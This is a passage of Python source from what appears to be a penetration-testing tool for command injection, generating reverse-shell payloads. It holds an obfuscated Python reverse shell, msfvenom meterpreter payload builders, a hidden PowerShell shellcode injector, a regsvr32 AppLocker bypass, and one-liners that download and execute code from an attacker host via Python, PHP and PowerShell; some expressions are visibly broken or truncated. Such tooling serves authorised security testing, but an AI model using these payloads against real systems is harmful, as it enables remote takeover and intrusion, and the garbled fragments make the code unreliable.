args=[s, p]))]][0] " \ "for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], " \ " stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] " \ "in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in " \ "[(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'], __this())[1] " \ "if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] " \ "for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: " \ "[(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) " \ "for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) " \ "for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] " \ "for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] " \ "for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), " \ "globals(), __import__('contextlib'))\"" if settings.TARGET_OS == "win" and not settings.USER_DEFINED_PYTHON_DIR: set_python_working_dir() other_shell = settings.WIN_PYTHON_DIR + data else: other_shell = "python" + data break # Python-reverse-shell (meterpreter) elif other_shell == '10': if not os.path.exists(settings.METASPLOIT_PATH): error_msg = settings.METASPLOIT_ERROR_MSG print(settings.print_error_msg(error_msg)) continue payload = "python/meterpreter/reverse_tcp" output = "py_meterpreter.rc" info_msg = "Generating the '" + payload + "' payload. " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: proc = subprocess.Popen("msfvenom -p " + str(payload) + " LHOST=" + str(settings.LHOST) + " LPORT=" + str(settings.LPORT) + " -o " + output + ">/dev/null 2>&1", shell=True).wait() with open(output, "r") as content_file: data = content_file.readlines() data = ''.join(data) data = base64.b64encode(data) print(settings.SUCCESS_STATUS) # Remove the ouput file. os.remove(output) with open(output, 'w+') as filewrite: filewrite.write("use exploit/multi/handler\n" "set payload " + payload + "\n" "set lhost " + str(settings.LHOST) + "\n" "set lport " + str(settings.LPORT) + "\n" "exploit\n\n") if settings.TARGET_OS == "win" and not settings.USER_DEFINED_PYTHON_DIR: set_python_working_dir() other_shell = settings.WIN_PYTHON_DIR + " -c exec('" + data + "'.decode('base64'))" else: other_shell = "python -c \"exec('" + data + "'.decode('base64'))\"" msf_launch_msg(output) except: print(settings.FAIL_STATUS) break # Powershell injection attacks elif other_shell == '11': if not settings.TARGET_OS == "win": windows_only_attack_vector() continue else: while True: windows_reverse_shell = _input( """ ---[ """ + Style.BRIGHT + Fore.BLUE + """Powershell injection attacks""" + Style.RESET_ALL + """ ]--- Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use shellcode injection with native x86 shellcode. Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' to use TrustedSec's Magic Unicorn. Type '""" + Style.BRIGHT + """3""" + Style.RESET_ALL + """' to use Regsvr32.exe application whitelisting bypass. \ncommix(""" + Style.BRIGHT + Fore.RED + """windows_meterpreter_reverse_tcp""" + Style.RESET_ALL + """) > """) if any(option in windows_reverse_shell.lower() for option in settings.SHELL_OPTIONS): if shell_options(windows_reverse_shell): return shell_options(windows_reverse_shell) elif windows_reverse_shell == '1': output = "powershell_attack.rc" elif windows_reverse_shell == '2': output = "powershell_attack.txt" elif windows_reverse_shell == '3': output = "regsvr32_applocker_bypass_server.rc" else: err_msg = "The '" + windows_reverse_shell + "' option, is not valid." print(settings.print_error_msg(err_msg)) continue if not os.path.exists(settings.METASPLOIT_PATH): error_msg = settings.METASPLOIT_ERROR_MSG print(settings.print_error_msg(error_msg)) continue payload = "windows/meterpreter/reverse_tcp" # Shellcode injection with native x86 shellcode if windows_reverse_shell == '1': gen_payload_msg(payload) try: proc = subprocess.Popen( "msfvenom -p " + str(payload) + " LHOST=" + str(settings.LHOST) + " LPORT=" + str(settings.LPORT) + " -f c -o " + output + ">/dev/null 2>&1", shell=True).wait() with open(output, 'r') as content_file: repls = { ';': '', ' ': '', '+': '', '"': '', '\n': '', 'buf=': '', '\\x': ',0x', 'unsignedcharbuf[]=': '' } shellcode = reduce( lambda a, kv: a.replace(*kv), iter(repls.items()),[1:] # One line shellcode injection with native x86 shellcode # Greetz to Dave Kennedy (@HackingDave) powershell_code = ( r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc64 = %s;[Byte[]]$sc = $sc64;$size = 0x1000;if ($sc.Length -gt 0x1000) {$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };';$goat = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if($env:PROCESSOR_ARCHITECTURE -eq "AMD64"){$x86 = $env:SystemRoot + "syswow64WindowsPowerShellv1.0powershell";$cmd = "-noninteractive -EncodedCommand";iex "& $x86 $cmd $goat"}else{$cmd = "-noninteractive -EncodedCommand";iex "& powershell $cmd $goat";}""" % (shellcode)) other_shell = "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " + base64.b64encode( powershell_code.encode('utf_16_le')) print(settings.SUCCESS_STATUS) with open(output, 'w+') as filewrite: filewrite.write("use exploit/multi/handler\n" "set payload " + payload + "\n" "set lhost " + str(settings.LHOST) + "\n" "set lport " + str(settings.LPORT) + "\n" "exploit\n\n") msf_launch_msg(output) except: print(settings.FAIL_STATUS) break # TrustedSec's Magic Unicorn (3rd Party) elif windows_reverse_shell == '2': try: current_path = os.getcwd() try: unicorn_path = os.path.abspath( os.path.join(os.path.dirname(__file__), '../../', 'thirdparty/unicorn')) os.chdir(unicorn_path) # Check for Unicorn version. with open('') as unicorn_file: for line in unicorn_file: line = line.rstrip() if "Magic Unicorn Attack Vector v" in line: unicorn_version = line.replace( "Magic Unicorn Attack Vector v", "").replace(" ", "").replace( "-", "").replace("\"", "").replace( ")", "") break except: unicorn_version = "" update.check_unicorn_version(unicorn_version) try: if len(unicorn_version) == 0: unicorn_path = os.path.abspath( os.path.join(os.path.dirname(__file__), '../../', 'thirdparty/unicorn')) os.chdir(unicorn_path) gen_payload_msg(payload) subprocess.Popen( "python" + " " + str(payload) + " " + str(settings.LHOST) + " " + str(settings.LPORT) + ">/dev/null 2>&1", shell=True).wait() with open(output, 'r') as content_file: other_shell = '\n', '') other_shell = _urllib.parse.quote_plus( other_shell) print(settings.SUCCESS_STATUS) # Remove the ouput file os.remove(output) with open("unicorn.rc", 'w+') as filewrite: filewrite.write( "use exploit/multi/handler\n" "set payload " + payload + "\n" "set lhost " + str(settings.LHOST) + "\n" "set lport " + str(settings.LPORT) + "\n" "exploit\n\n") msf_launch_msg("unicorn.rc") # Return to the current path. os.chdir(current_path) except: continue except: print(settings.FAIL_STATUS) break # Regsvr32.exe application whitelisting bypass elif windows_reverse_shell == '3': with open(output, 'w+') as filewrite: filewrite.write( "use exploit/windows/misc/regsvr32_applocker_bypass_server\n" "set payload " + payload + "\n" "set lhost " + str(settings.LHOST) + "\n" "set lport " + str(settings.LPORT) + "\n" "set srvport " + str(settings.SRVPORT) + "\n" "set uripath " + settings.URIPATH + "\n" "exploit\n\n") if not settings.TARGET_OS == "win": windows_only_attack_vector() continue else: other_shell = "regsvr32 /s /n /u /i:http://" + str( settings.LHOST) + ":" + str( settings.SRVPORT ) + settings.URIPATH + ".sct scrobj.dll" msf_launch_msg(output) break break # Web delivery script elif other_shell == '12': while True: web_delivery = _input( """ ---[ """ + Style.BRIGHT + Fore.BLUE + """Web delivery script""" + Style.RESET_ALL + """ ]--- Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use Python meterpreter reverse TCP shell. Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' to use PHP meterpreter reverse TCP shell. Type '""" + Style.BRIGHT + """3""" + Style.RESET_ALL + """' to use Windows meterpreter reverse TCP shell. \ncommix(""" + Style.BRIGHT + Fore.RED + """web_delivery""" + Style.RESET_ALL + """) > """) if any(option in web_delivery.lower() for option in settings.SHELL_OPTIONS): if shell_options(web_delivery): return shell_options(web_delivery) elif web_delivery == '1': payload = "python/meterpreter/reverse_tcp" elif web_delivery == '2': payload = "php/meterpreter/reverse_tcp" elif web_delivery == '3': payload = "windows/meterpreter/reverse_tcp" else: err_msg = "The '" + web_delivery + "' option, is not valid." print(settings.print_error_msg(err_msg)) continue if not os.path.exists(settings.METASPLOIT_PATH): error_msg = settings.METASPLOIT_ERROR_MSG print(settings.print_error_msg(error_msg)) continue if 'payload' in locals(): output = "web_delivery.rc" with open(output, 'w+') as filewrite: filewrite.write( "use exploit/multi/script/web_delivery\n" "set target " + str(int(web_delivery) - 1) + "\n" "set payload " + payload + "\n" "set lhost " + str(settings.LHOST) + "\n" "set lport " + str(settings.LPORT) + "\n" "set srvport " + str(settings.SRVPORT) + "\n" "set uripath " + settings.URIPATH + "\n" "exploit\n\n") if web_delivery == '1': data = "; r=_urllib.request.urlopen('http://" + str( settings.LHOST) + ":" + str( settings.SRVPORT ) + settings.URIPATH + "'); exec(;" data = base64.b64encode(data) if settings.TARGET_OS == "win" and not settings.USER_DEFINED_PYTHON_DIR: set_python_working_dir() other_shell = settings.WIN_PYTHON_DIR + " -c exec('" + data + "'.decode('base64'))" else: other_shell = "python -c \"exec('" + data + "'.decode('base64'))\"" msf_launch_msg(output) break elif web_delivery == '2': if settings.TARGET_OS == "win" and not settings.USER_DEFINED_PHP_DIR: set_php_working_dir() other_shell = settings.WIN_PHP_DIR + " -d allow_url_fopen=true -r eval(file_get_contents('http://" + str( settings.LHOST) + ":" + str( settings.SRVPORT ) + settings.URIPATH + "'));" else: other_shell = "php -d allow_url_fopen=true -r \"eval(file_get_contents('http://" + str( settings.LHOST) + ":" + str( settings.SRVPORT ) + settings.URIPATH + "'));\"" msf_launch_msg(output) break elif web_delivery == '3': if not settings.TARGET_OS == "win": windows_only_attack_vector() continue else: other_shell = "powershell -nop -w hidden -c $x=new-object net.webclient;$x.proxy=[Net.WebRequest]::GetSystemWebProxy(); $x.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials; IEX $x.downloadstring('http://" + str( settings.LHOST) + ":" + str( settings.SRVPORT ) + settings.URIPATH + "');" msf_launch_msg(output) break break # Check for available shell options elif any(option in other_shell.lower() for option in settings.SHELL_OPTIONS): if shell_options(other_shell): return shell_options(other_shell) # Invalid option else: err_msg = "The '" + other_shell + "' option, is not valid." print(settings.print_error_msg(err_msg)) continue return other_shell
def randomIP(): numbers = [] while not numbers or numbers[0] in (10, 172, 192): numbers = sample(xrange(1, 255), 4) return '.'.join(str(_) for _ in numbers)